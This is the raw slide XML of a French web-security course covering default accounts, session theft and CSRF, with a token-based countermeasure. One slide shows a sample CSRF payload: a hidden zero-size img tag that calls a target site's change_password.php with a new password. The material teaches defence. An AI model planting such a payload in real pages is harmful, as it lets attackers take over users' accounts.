                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A0660CD-3AFC-47E7-AA98-0521CD244528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684208" y="4874121"/>
            <a:ext cx="9958807" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
              <a:alpha val="49000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Il faut recourir au fonctionnement par liste blanche ou à un traitement rigoureux des données externes à chaque fois qu’elles sont employées.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11121871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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="525380"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les configurations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A84B7F-9996-467C-8B6E-9D1FE1E149BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="1835312"/>
            <a:ext cx="10258608" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000">
              <a:alpha val="32000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>es comptes par défaut, présents dans de nombreux composants qu’il s’agisse de bases de données ou de serveurs web, sont très dangereux. De nombreux comptes par défaut utilisant “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” comme login et “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” comme mot de passe sont encore aujourd’hui fournis avec des logiciels ou serveurs et doivent absolument être supprimés lors de l’installation de ces composants dans votre environnement web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-F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fr-FR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’assurer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> que la mise en place de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nouveaux serveurs ou composants n’introduira pas de vulnérabilité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>S’assurer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> que vous avez une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> politique de maintenance solide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Effacer systématiquement les fichiers exemple de configuration et les fichiers d’installation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">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613688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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La gestion des sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A84B7F-9996-467C-8B6E-9D1FE1E149BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="3765444"/>
            <a:ext cx="10258608" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000">
              <a:alpha val="62000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les identifiants de session doivent être aléatoires.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Certains systèmes utilisent une variable GET (c’est à dire un composant de l’URL) pour passer l’identifiant de session. Cette approche est à proscrire car elle facilite grandement le vol de session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le protocole HTTPS permet de se protégé des écoutes passives d’identifiant de session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Forcer l’utilisateur à se re-identifier, limiter la durée de vie des sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8C4ED5-D2A0-4EC9-8B60-5FE75E5D99F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="1864994"/>
            <a:ext cx="3628709" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="48000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le mécanisme de sessions permet de conserver des informations côté serveur entre deux requêtes du client.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A149DB3-60E0-4F7D-B67E-4F5D903DBC14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4827272" y="1674674"/>
            <a:ext cx="6103620" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050">
              <a:alpha val="51000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il suffit à un attaquant de mettre une en-tête Cookie contrefaite dans les en-têtes HTTP qu’il envoie pour que ses requêtes soient attribuées à la session associée à cet identifiant et obtienne des privilèges de l’utilisateur légitime de la session. On parle de alors « vol de session ». </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39285328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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="477254"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les attaques CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A84B7F-9996-467C-8B6E-9D1FE1E149BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="863671" y="1673031"/>
            <a:ext cx="5122229" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="32000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les attaques du type X/CSRF (Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) ont pour objet d’amener un utilisateur légitime d’un site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(ou plus précisément, à son insu, son navigateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) à y effectuer une requête HTTP dont le contenu est contrôlé par l’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le CSRF se base sur la confiance attribuée aux utilisateurs par l’application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BDB17C6-04CB-49AF-BCC8-829BC49BC5EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="5550135"/>
            <a:ext cx="9787237" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=“http://site-web-cible.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>change_password.php?new_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>letmein</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” height=0 width=0&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="OWASP / Cross-site request forgery (CSRF ou XSRF) - Clever Age">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{524557C6-501F-4FF6-B157-CA816CB00E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06101" y="1584595"/>
            <a:ext cx="5284753" cy="36070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8280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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="477254"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les attaques CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13C7093-1A81-455C-AD9E-687A7B4EC7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24970" y="2057123"/>
            <a:ext cx="5182940" cy="3520225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03D6C93A-6E94-4E36-BD16-6717EF086A3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322438" y="1451038"/>
            <a:ext cx="6502532" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000">
              <a:alpha val="47000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Solution préconisée :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’utilisateur appelle une page, le serveur génère un jeton CSRF unique et non prédictible, et le stock en session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
